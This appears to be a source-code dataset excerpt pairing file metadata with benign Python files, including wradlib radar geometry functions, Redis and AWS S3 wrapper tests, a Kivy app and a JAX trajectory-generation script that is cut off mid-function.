| 32.794872 | 115 | 0.723221 | 175 | 1,279 | 5.211429 | 0.44 | 0.087719 | 0.028509 | 0.037281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006458 | 0.152463 | 1,279 | 38 | 116 | 33.657895 | 0.834871 | 0.305708 | 0 | 0 | 0 | 0 | 0.260274 | 0.068493 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.083333 | 0.166667 | 0 | 0.166667 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
eae5610490f4bff538d28053548c7a7377626c1f | 4,362 | py | Python | wradlib/georef/misc.py | ElmerJeanpierreLopez/wradlib | ae6aa24c68f431b735a742510cea3475fb55059d | [
"MIT"
] | null | null | null | wradlib/georef/misc.py | ElmerJeanpierreLopez/wradlib | ae6aa24c68f431b735a742510cea3475fb55059d | [
"MIT"
] | null | null | null | wradlib/georef/misc.py | ElmerJeanpierreLopez/wradlib | ae6aa24c68f431b735a742510cea3475fb55059d | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2011-2019, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
"""
Miscellaneous
^^^^^^^^^^^^^
.. autosummary::
:nosignatures:
:toctree: generated/
bin_altitude
bin_distance
site_distance
"""
import numpy as np
def bin_altitude(r, theta, sitealt, re, ke=4./3.):
"""Calculates the height of a radar bin taking the refractivity of the \
atmosphere into account.
Based on :cite:`Doviak1993` the bin altitude is calculated as
.. math::
h = \\sqrt{r^2 + (k_e r_e)^2 + 2 r k_e r_e \\sin\\theta} - k_e r_e
Parameters
----------
r : :class:`numpy:numpy.ndarray`
Array of ranges [m]
theta : scalar or :class:`numpy:numpy.ndarray` broadcastable to the shape
of r elevation angles in degrees with 0° at horizontal and +90°
pointing vertically upwards from the radar
sitealt : float
Altitude in [m] a.s.l. of the referencing radar site
re : float
earth's radius [m]
ke : float
adjustment factor to account for the refractivity gradient that
affects radar beam propagation. In principle this is wavelength-
dependent. The default of 4/3 is a good approximation for most
weather radar wavelengths
Returns
-------
altitude : :class:`numpy:numpy.ndarray`
Array of heights of the radar bins in [m]
"""
reff = ke * re
sr = reff + sitealt
return np.sqrt(r ** 2 + sr ** 2 +
2 * r * sr * np.sin(np.radians(theta))) - reff
def bin_distance(r, theta, sitealt, re, ke=4./3.):
"""Calculates great circle distance from radar site to radar bin over \
spherical earth, taking the refractivity of the atmosphere into account.
.. math::
s = k_e r_e \\arctan\\left(
\\frac{r \\cos\\theta}{r \\cos\\theta + k_e r_e + h}\\right)
where :math:`h` would be the radar site altitude amsl.
Parameters
----------
r : :class:`numpy:numpy.ndarray`
Array of ranges [m]
theta : scalar or :class:`numpy:numpy.ndarray` broadcastable to the shape
of r elevation angles in degrees with 0° at horizontal and +90°
pointing vertically upwards from the radar
sitealt : float
site altitude [m] amsl.
re : float
earth's radius [m]
ke : float
adjustment factor to account for the refractivity gradient that
affects radar beam propagation. In principle this is wavelength-
dependent. The default of 4/3 is a good approximation for most
weather radar wavelengths
Returns
-------
distance : :class:`numpy:numpy.ndarray`
Array of great circle arc distances [m]
"""
reff = ke * re
sr = reff + sitealt
theta = np.radians(theta)
return reff * np.arctan(r * np.cos(theta) / (r * np.sin(theta) + sr))
def site_distance(r, theta, binalt, re=None, ke=4./3.):
"""Calculates great circle distance from bin at certain altitude to the \
radar site over spherical earth, taking the refractivity of the \
atmosphere into account.
Based on :cite:`Doviak1993` the site distance may be calculated as
.. math::
s = k_e r_e \\arcsin\\left(
\\frac{r \\cos\\theta}{k_e r_e + h_n(r, \\theta, r_e, k_e)}\\right)
where :math:`h_n` would be provided by
:func:`~wradlib.georef.misc.bin_altitude`.
Parameters
----------
r : :class:`numpy:numpy.ndarray`
Array of ranges [m]
theta : scalar or :class:`numpy:numpy.ndarray` broadcastable to the shape
of r elevation angles in degrees with 0° at horizontal and +90°
pointing vertically upwards from the radar
binalt : :class:`numpy:numpy.ndarray`
site altitude [m] amsl. same shape as r.
re : float
earth's radius [m]
ke : float
adjustment factor to account for the refractivity gradient that
affects radar beam propagation. In principle this is wavelength-
dependent. The default of 4/3 is a good approximation for most
weather radar wavelengths
Returns
-------
distance : :class:`numpy:numpy.ndarray`
Array of great circle arc distances [m]
"""
reff = ke * re
return reff * np.arcsin(r * np.cos(np.radians(theta)) / (reff + binalt))
| 31.381295 | 77 | 0.631133 | 622 | 4,362 | 4.395498 | 0.23955 | 0.036576 | 0.054865 | 0.080468 | 0.686174 | 0.673738 | 0.656547 | 0.643745 | 0.590344 | 0.590344 | 0 | 0.013669 | 0.262036 | 4,362 | 138 | 78 | 31.608696 | 0.833799 | 0.781293 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eae8b1571de983e30e5b62cbb49111d3bbe371a5 | 3,773 | py | Python | tests/test_redis.py | arrrlo/python-transfer | 653c74e8db8da0ff6ee37dff4534b52b4fc7a29c | [
"MIT"
] | null | null | null | tests/test_redis.py | arrrlo/python-transfer | 653c74e8db8da0ff6ee37dff4534b52b4fc7a29c | [
"MIT"
] | null | null | null | tests/test_redis.py | arrrlo/python-transfer | 653c74e8db8da0ff6ee37dff4534b52b4fc7a29c | [
"MIT"
] | 1 | 2021-07-30T06:01:20.000Z | 2021-07-30T06:01:20.000Z | import os
import pytest
import fakeredis
from db_transfer.adapter_redis import Redis
from db_transfer.transfer import Transfer, sent_env
@pytest.fixture()
def fake_redis(monkeypatch):
fake_redis = lambda *args, **kwargs: fakeredis.FakeStrictRedis(decode_responses=True)
monkeypatch.setattr(Redis, 'connect', fake_redis)
#fake_redis().flushall()
return fake_redis
@pytest.fixture()
def redis_transfer(fake_redis):
os.environ['test_host_1'] = 'localhost'
os.environ['test_port_1'] = '6379'
os.environ['test_db_1'] = '0'
@sent_env('redis', 'HOST', 'test_host_1')
@sent_env('redis', 'PORT', 'test_port_1')
@sent_env('redis', 'DB', 'test_db_1')
class TestHandlerRedis_1(Transfer):
pass
redis_transfer = TestHandlerRedis_1(namespace='namespace_1', adapter_name='redis')
return redis_transfer
def test_redis_string(redis_transfer):
redis_transfer['key_1'] = 'value'
redis_transfer['key_2:key_3'] = 'value'
with redis_transfer:
redis_transfer['key_4'] = 'value'
redis_transfer['key_2:key_5'] = 'value'
assert str(redis_transfer['key_1']) == 'value'
assert str(redis_transfer['key_2:key_3']) == 'value'
assert str(redis_transfer['key_4']) == 'value'
assert str(redis_transfer['key_2:key_5']) == 'value'
def test_redis_list(redis_transfer):
redis_transfer['key_6:key_7'] = ['list_element_1', 'list_element_2']
with redis_transfer:
redis_transfer['key_8:key_9'] = [['list_element_1', 'list_element_2']]
redis_transfer['key_10'] = [{'key': 'value', 'foo': 'bar'}, {'key': 'value'}]
assert list(redis_transfer['key_6:key_7']) == ['list_element_1', 'list_element_2']
assert list(redis_transfer['key_8:key_9']) == [['list_element_1', 'list_element_2']]
assert list(redis_transfer['key_10']) == [{'key': 'value', 'foo': 'bar'}, {'key': 'value'}]
def test_redis_set(redis_transfer):
redis_transfer['key_11:key_12'] = set(['list_element_1', 'list_element_2'])
assert set(redis_transfer['key_11:key_12']) == {'list_element_1', 'list_element_2'}
def test_redis_hash(redis_transfer):
test_dict = {'foo': 'bar', 'doo': {'goo': 'gar'}, 'zoo': [1, 2, 3, {'foo': 'bar'}]}
redis_transfer['hash_key'] = test_dict
assert dict(redis_transfer['hash_key']) == test_dict
assert redis_transfer['hash_key']['foo'] == test_dict['foo']
assert redis_transfer['hash_key']['doo'] == test_dict['doo']
assert redis_transfer['hash_key']['zoo'] == test_dict['zoo']
for key, value in redis_transfer['hash_key']:
assert test_dict[key] == value
def test_redis_hash_iterator(redis_transfer):
test_dict = {'foo': 'bar', 'doo': {'goo': 'gar'}, 'zoo': [1, 2, 3, {'foo': 'bar'}]}
redis_transfer['hash_key'] = test_dict
for key, value in iter(redis_transfer['hash_key']):
assert test_dict[key] == value
def test_redis_delete(redis_transfer):
redis_transfer['some_key_1'] = 'some_value'
assert str(redis_transfer['some_key_1']) == 'some_value'
del redis_transfer['some_key_1']
assert redis_transfer['some_key_1'] is None
def test_redis_keys(redis_transfer):
assert redis_transfer.keys() == ['hash_key', 'key_1', 'key_10',
'key_11:key_12', 'key_2:key_3',
'key_2:key_5', 'key_4', 'key_6:key_7',
'key_8:key_9']
assert redis_transfer['key_2'].keys() == ['key_2:key_3', 'key_2:key_5']
del redis_transfer['key_2:key_3']
del redis_transfer['key_2:key_5']
assert redis_transfer.keys() == ['hash_key', 'key_1', 'key_10',
'key_11:key_12', 'key_4', 'key_6:key_7',
'key_8:key_9']
| 34.935185 | 95 | 0.642725 | 533 | 3,773 | 4.172608 | 0.144465 | 0.26304 | 0.136691 | 0.071942 | 0.631295 | 0.539568 | 0.43705 | 0.34982 | 0.306205 | 0.306205 | 0 | 0.03437 | 0.1903 | 3,773 | 107 | 96 | 35.261682 | 0.693617 | 0.006096 | 0 | 0.191781 | 0 | 0 | 0.240331 | 0 | 0 | 0 | 0 | 0 | 0.260274 | 1 | 0.123288 | false | 0.013699 | 0.068493 | 0 | 0.232877 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaf3f83969eefc20c915399632dfbe8f86dda3dd | 8,087 | py | Python | atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 8aca652d7e647b4e88530b93e265b536de7055ed | [
"Apache-2.0"
] | 296 | 2020-03-16T19:55:00.000Z | 2022-01-10T19:46:05.000Z | atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 8aca652d7e647b4e88530b93e265b536de7055ed | [
"Apache-2.0"
] | 57 | 2020-03-17T11:15:57.000Z | 2021-07-10T14:42:27.000Z | atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 8aca652d7e647b4e88530b93e265b536de7055ed | [
"Apache-2.0"
] | 38 | 2020-03-17T21:06:05.000Z | 2022-02-08T03:19:34.000Z |
import unittest
from mock import Mock
from foundations_spec import *
from foundations_aws.aws_bucket import AWSBucket
class TestAWSBucket(Spec):
class MockListing(object):
def __init__(self, bucket, files):
self._bucket = bucket
self._files = files
def __call__(self, Bucket, Prefix, Delimiter):
if Bucket != self._bucket:
return {}
return {
'Contents': [{'Key': Prefix + key} for key in self._grouped_and_prefixed_files(Prefix, Delimiter)],
'CommonPrefixes': [{'Prefix': Prefix + new_prefix} for new_prefix in self._unique_delimited_prefixes(Prefix, Delimiter)]
}
def _unique_delimited_prefixes(self, prefix, delimiter):
items = set()
# below is done to preserve order
for key in self._prefixes(prefix, delimiter):
if not key in items:
items.add(key)
yield key
def _prefixes(self, prefix, delimiter):
for key in self._prefixed_files(prefix):
if delimiter in key:
yield key.split(delimiter)[0]
def _grouped_and_prefixed_files(self, prefix, delimiter):
for key in self._prefixed_files(prefix):
if not delimiter in key:
yield key
def _prefixed_files(self, prefix):
prefix_length = len(prefix)
for key in self._files:
if key.startswith(prefix):
yield key[prefix_length:]
connection_manager = let_patch_mock(
'foundations_aws.global_state.connection_manager'
)
connection = let_mock()
mock_file = let_mock()
@let
def file_name(self):
return self.faker.name()
@let
def data(self):
return self.faker.sha256()
@let
def data_body(self):
mock = Mock()
mock.read.return_value = self.data
mock.iter_chunks.return_value = [self.data]
return mock
@let
def bucket_prefix(self):
return self.faker.name()
@let
def bucket_postfix(self):
return self.faker.uri_path()
@let
def bucket_name_with_slashes(self):
return self.bucket_prefix + '/' + self.bucket_postfix
@let
def upload_file_name_with_slashes(self):
return self.bucket_postfix + '/' + self.file_name
@let
def bucket(self):
return AWSBucket(self.bucket_path)
@let
def bucket_with_slashes(self):
return AWSBucket(self.bucket_name_with_slashes)
@let
def bucket_path(self):
return 'testing-bucket'
@let
def source_path(self):
return self.faker.name()
@let
def source_path_with_slashes(self):
return self.bucket_postfix + '/' + self.source_path
@set_up
def set_up(self):
self.connection_manager.bucket_connection.return_value = self.connection
def test_upload_from_string_uploads_data_to_bucket_with_prefix(self):
self.bucket_with_slashes.upload_from_string(self.file_name, self.data)
self.connection.put_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes, Body=self.data)
def test_exists_returns_true_when_file_exists_with_prefix(self):
self.bucket_with_slashes.exists(self.file_name)
self.connection.head_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
def test_download_as_string_uploads_data_to_bucket_with_prefix(self):
self.connection.get_object = ConditionalReturn()
self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
result = self.bucket_with_slashes.download_as_string(self.file_name)
self.assertEqual(self.data, result)
def test_download_to_file_uploads_data_to_bucket_with_prefix(self):
self.connection.get_object = ConditionalReturn()
self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
result = self.bucket_with_slashes.download_to_file(self.file_name, self.mock_file)
self.mock_file.write.assert_called_with(self.data)
def test_remove_removes_prefixed_files(self):
self.bucket_with_slashes.remove(self.file_name)
self.connection.delete_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
def test_move_moves_prefixed_files(self):
self.bucket_with_slashes.move(self.source_path, self.file_name)
source_info = {'Bucket': self.bucket_prefix, 'Key': self.source_path_with_slashes}
self.connection.copy_object.assert_called_with(Bucket=self.bucket_prefix, CopySource=source_info, Key=self.upload_file_name_with_slashes)
def test_list_files_returns_empty(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
[]
)
self.assertEqual([], self._fetch_listing('*'))
def test_list_files_returns_all_results(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt', 'scheduler.log'], self._fetch_listing('*'))
def test_list_files_returns_file_type_filter(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt'], self._fetch_listing('*.txt'))
def test_list_files_returns_all_results_dot_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt', 'scheduler.log'],
self._fetch_listing('./*'))
def test_list_files_returns_file_type_filter_dot_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt'], self._fetch_listing('./*.txt'))
def test_list_files_returns_only_local_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log', 'path/to/some/other/files']
)
self.assertEqual(['my.txt', 'scheduler.log', 'path'], self._fetch_listing('*'))
def test_list_files_returns_only_sub_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log', 'path/to/some/other/files']
)
self.assertEqual(['path/to/some/other/files'], self._fetch_listing('path/to/some/other/*'))
def test_list_files_returns_folder_within_sub_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['path/to/some/other/files']
)
self.assertEqual(['path/to'], self._fetch_listing('path/*'))
def test_list_files_returns_arbitrary_filter(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['some_stuff_here', 'no_stuff_there', 'some_more_stuff_here']
)
self.assertEqual(['some_stuff_here', 'some_more_stuff_here'], self._fetch_listing('some_*_here'))
def test_list_files_supports_prefixes(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_prefix,
[self.upload_file_name_with_slashes]
)
result = list(self.bucket_with_slashes.list_files('*'))
self.assertEqual([self.file_name], result)
def _fetch_listing(self, pathname):
generator = self.bucket.list_files(pathname)
return list(generator)
| 37.267281 | 145 | 0.66712 | 1,002 | 8,087 | 5.028942 | 0.134731 | 0.069458 | 0.046438 | 0.031752 | 0.608454 | 0.538797 | 0.524509 | 0.463187 | 0.422306 | 0.395515 | 0 | 0.002251 | 0.230988 | 8,087 | 216 | 146 | 37.439815 | 0.808008 | 0.003833 | 0 | 0.282353 | 0 | 0 | 0.067304 | 0.017757 | 0 | 0 | 0 | 0 | 0.094118 | 1 | 0.211765 | false | 0 | 0.023529 | 0.064706 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaf751a9a0bcab3d9157ea5ae5ba0acfa2a5324c | 1,413 | py | Python | molecular_computation/procedures/gel_electrophoresis.py | shakedmanes/molecular-computation | 80d759c74288f99dfb7c3dab2a5d1e88b17e3171 | [
"MIT"
] | null | null | null | molecular_computation/procedures/gel_electrophoresis.py | shakedmanes/molecular-computation | 80d759c74288f99dfb7c3dab2a5d1e88b17e3171 | [
"MIT"
] | null | null | null | molecular_computation/procedures/gel_electrophoresis.py | shakedmanes/molecular-computation | 80d759c74288f99dfb7c3dab2a5d1e88b17e3171 | [
"MIT"
] | null | null | null | from molecules.dna_molecule import DNAMolecule
from molecules.dna_sequence import DNASequence
class GelElectrophoresis:
"""
Produce the Gel Electrophoresis procedure to sort DNA molecules by their size.
"""
@staticmethod
def run_gel(dna_molecules):
"""
Runs the Gel Electrophoresis procedure to sort DNA molecules by their size.
:param dna_molecules: DNA molecules.
:return: Sorted list of the DNA molecules given.
"""
molecules = list(dna_molecules)
molecules.sort(key=lambda mol: mol.length)
return molecules
if __name__ == '__main__':
dna_sequences = [
DNASequence.create_random_sequence(size=20),
DNASequence.create_random_sequence(size=10),
DNASequence.create_random_sequence(size=30),
DNASequence.create_random_sequence(size=5),
DNASequence.create_random_sequence(size=15)
]
ex_dna_molecules = [
DNAMolecule(dna_sequences[index], dna_sequences[index].get_complement())
for index in range(len(dna_sequences))
]
print('DNA molecules:')
for molecule in ex_dna_molecules:
print(f'{molecule}\n')
print('\nRun Gel Electrophoresis on DNA molecules:')
gel_dna_molecules = GelElectrophoresis.run_gel(ex_dna_molecules)
print('Results DNA molecules:')
for molecule in gel_dna_molecules:
print(f'{molecule}\n')
| 28.836735 | 83 | 0.690729 | 167 | 1,413 | 5.60479 | 0.353293 | 0.192308 | 0.122863 | 0.165598 | 0.424145 | 0.183761 | 0.126068 | 0.126068 | 0.126068 | 0.126068 | 0 | 0.008204 | 0.223638 | 1,413 | 48 | 84 | 29.4375 | 0.845032 | 0.170559 | 0 | 0.071429 | 0 | 0 | 0.099552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.071429 | 0 | 0.178571 | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d80aded943ac31da1cf1d442bfacdc0c574d184b | 583 | py | Python | jobs/tests.py | dukedbgroup/BayesianTuner | e74dc61c846c3beab95ca2140c1aab1d5179e208 | [
"Apache-2.0"
] | 13 | 2018-03-10T23:32:16.000Z | 2019-09-10T14:20:46.000Z | jobs/tests.py | dukedbgroup/BayesianTuner | e74dc61c846c3beab95ca2140c1aab1d5179e208 | [
"Apache-2.0"
] | null | null | null | jobs/tests.py | dukedbgroup/BayesianTuner | e74dc61c846c3beab95ca2140c1aab1d5179e208 | [
"Apache-2.0"
] | 1 | 2018-12-12T22:17:51.000Z | 2018-12-12T22:17:51.000Z | from unittest import TestCase
from logger import get_logger
from config import get_config
from .runner import JobsRunner
logger = get_logger(__name__, log_level=("TEST", "LOGLEVEL"))
config = get_config()
def test_run(self, config, job_config, date):
print("Running test job")
class JobRunnerTests(TestCase):
def setUp(self):
self.runner = JobsRunner(config)
self.runner.run_loop()
def tearDown(self):
self.runner.stop_loop()
def testAddJob(self):
self.runner.add_job("test_job", "jobs.tests.test_run", {"schedule_at": "01:00"})
| 25.347826 | 88 | 0.703259 | 79 | 583 | 4.974684 | 0.443038 | 0.101781 | 0.10687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008333 | 0.176672 | 583 | 22 | 89 | 26.5 | 0.810417 | 0 | 0 | 0 | 0 | 0 | 0.121784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5625 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d80ea4320731a7f5c8a15b5c673de800b94a36ed | 463 | py | Python | underscore/declaration.py | doboy/Underscore | d98273db3144cda79191d2c90f45d81b6d700b1f | [
"MIT"
] | 7 | 2016-09-23T00:44:05.000Z | 2021-10-04T21:19:12.000Z | underscore/declaration.py | jameswu1991/Underscore | d98273db3144cda79191d2c90f45d81b6d700b1f | [
"MIT"
] | 1 | 2016-09-23T00:45:05.000Z | 2019-02-16T19:05:37.000Z | underscore/declaration.py | jameswu1991/Underscore | d98273db3144cda79191d2c90f45d81b6d700b1f | [
"MIT"
] | 3 | 2016-09-23T01:13:15.000Z | 2018-07-20T21:22:17.000Z | # Copyright (c) 2013 Huan Do, http://huan.do
class Declaration(object):
def __init__(self, name):
self.name = name
self.delete = False
self._conditional = None
@property
def conditional(self):
assert self._conditional is not None
return self.delete or self._conditional
def generator():
_ = '_'
while True:
# yield Declaration('_' + str(len(_)))
yield Declaration(_)
_ += '_'
| 23.15 | 47 | 0.593952 | 50 | 463 | 5.22 | 0.58 | 0.172414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01227 | 0.295896 | 463 | 19 | 48 | 24.368421 | 0.788344 | 0.170626 | 0 | 0 | 0 | 0 | 0.005249 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 1 | 0.214286 | false | 0 | 0 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d810e9e8b14b2edde01e890b4f74510b0b268466 | 312 | py | Python | camara_con_kivy.py | Rocha117/Laboratorio_07 | 1d1b646f9665523962a7d8addf16b056f437bc27 | [
"MIT"
] | null | null | null | camara_con_kivy.py | Rocha117/Laboratorio_07 | 1d1b646f9665523962a7d8addf16b056f437bc27 | [
"MIT"
] | null | null | null | camara_con_kivy.py | Rocha117/Laboratorio_07 | 1d1b646f9665523962a7d8addf16b056f437bc27 | [
"MIT"
] | null | null | null | from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class CamaraWindow(BoxLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
class CamaraApp(App):
def build(self):
return CamaraWindow()
if __name__ == '__main__':
CamaraApp().run() | 22.285714 | 41 | 0.634615 | 34 | 312 | 5.352941 | 0.588235 | 0.087912 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246795 | 312 | 14 | 42 | 22.285714 | 0.774468 | 0 | 0 | 0 | 0 | 0 | 0.026667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d813fe7e8c53a4b341a427a7aa1d706dae039f16 | 310 | py | Python | dockernd/python/ND/NostalgiaDrive/setup.py | mchellmer/DockerMongoFceuxPython | f7db8fc976d76046ca03f707f9845d348f9be651 | [
"MIT"
] | null | null | null | dockernd/python/ND/NostalgiaDrive/setup.py | mchellmer/DockerMongoFceuxPython | f7db8fc976d76046ca03f707f9845d348f9be651 | [
"MIT"
] | null | null | null | dockernd/python/ND/NostalgiaDrive/setup.py | mchellmer/DockerMongoFceuxPython | f7db8fc976d76046ca03f707f9845d348f9be651 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(
name='nd',
py_modules=['nd'],
version='1.0.0',
description='user friendly emulation game selection',
license="MIT",
author='Mark Hellmer',
author_email='mchellmer@gmail.com',
install_requires=['tkinter', 'nltk', 'pymongo'],
scripts=[]
)
| 22.142857 | 57 | 0.645161 | 36 | 310 | 5.472222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011952 | 0.190323 | 310 | 13 | 58 | 23.846154 | 0.772908 | 0 | 0 | 0 | 0 | 0 | 0.319355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d81683ba8142b60ee8046ff652ca3747377a9744 | 4,729 | py | Python | generate_data.py | StanfordASL/Adaptive-Control-Oriented-Meta-Learning | 093d2764314bbfccc3a804fb9e737a10d08a1eb5 | [
"MIT"
] | 24 | 2021-03-14T19:00:49.000Z | 2022-03-23T14:31:33.000Z | generate_data.py | wuyou33/Adaptive-Control-Oriented-Meta-Learning | 093d2764314bbfccc3a804fb9e737a10d08a1eb5 | [
"MIT"
] | 1 | 2021-06-07T09:57:26.000Z | 2021-06-12T19:57:00.000Z | generate_data.py | wuyou33/Adaptive-Control-Oriented-Meta-Learning | 093d2764314bbfccc3a804fb9e737a10d08a1eb5 | [
"MIT"
] | 3 | 2021-06-14T09:05:27.000Z | 2021-12-22T19:31:15.000Z | """
TODO description.
Author: Spencer M. Richards
Autonomous Systems Lab (ASL), Stanford
(GitHub: spenrich)
"""
if __name__ == "__main__":
import pickle
import jax
import jax.numpy as jnp
from jax.experimental.ode import odeint
from utils import spline, random_ragged_spline
from dynamics import prior, plant, disturbance
# Seed random numbers
seed = 0
key = jax.random.PRNGKey(seed)
# Generate smooth trajectories
num_traj = 500
T = 30
num_knots = 6
poly_orders = (9, 9, 6)
deriv_orders = (4, 4, 2)
min_step = jnp.array([-2., -2., -jnp.pi/6])
max_step = jnp.array([2., 2., jnp.pi/6])
min_knot = jnp.array([-jnp.inf, -jnp.inf, -jnp.pi/3])
max_knot = jnp.array([jnp.inf, jnp.inf, jnp.pi/3])
key, *subkeys = jax.random.split(key, 1 + num_traj)
subkeys = jnp.vstack(subkeys)
in_axes = (0, None, None, None, None, None, None, None, None)
t_knots, knots, coefs = jax.vmap(random_ragged_spline, in_axes)(
subkeys, T, num_knots, poly_orders, deriv_orders,
min_step, max_step, min_knot, max_knot
)
# x_coefs, y_coefs, ϕ_coefs = coefs
r_knots = jnp.dstack(knots)
# Sampled-time simulator
@jax.partial(jax.vmap, in_axes=(None, 0, 0, 0))
def simulate(ts, w, t_knots, coefs,
plant=plant, prior=prior, disturbance=disturbance):
"""TODO: docstring."""
# Construct spline reference trajectory
def reference(t):
x_coefs, y_coefs, ϕ_coefs = coefs
x = spline(t, t_knots, x_coefs)
y = spline(t, t_knots, y_coefs)
ϕ = spline(t, t_knots, ϕ_coefs)
ϕ = jnp.clip(ϕ, -jnp.pi/3, jnp.pi/3)
r = jnp.array([x, y, ϕ])
return r
# Required derivatives of the reference trajectory
def ref_derivatives(t):
ref_vel = jax.jacfwd(reference)
ref_acc = jax.jacfwd(ref_vel)
r = reference(t)
dr = ref_vel(t)
ddr = ref_acc(t)
return r, dr, ddr
# Feedback linearizing PD controller
def controller(q, dq, r, dr, ddr):
kp, kd = 10., 0.1
e, de = q - r, dq - dr
dv = ddr - kp*e - kd*de
H, C, g, B = prior(q, dq)
τ = H@dv + C@dq + g
u = jnp.linalg.solve(B, τ)
return u, τ
# Closed-loop ODE for `x = (q, dq)`, with a zero-order hold on
# the controller
def ode(x, t, u, w=w):
q, dq = x
f_ext = disturbance(q, dq, w)
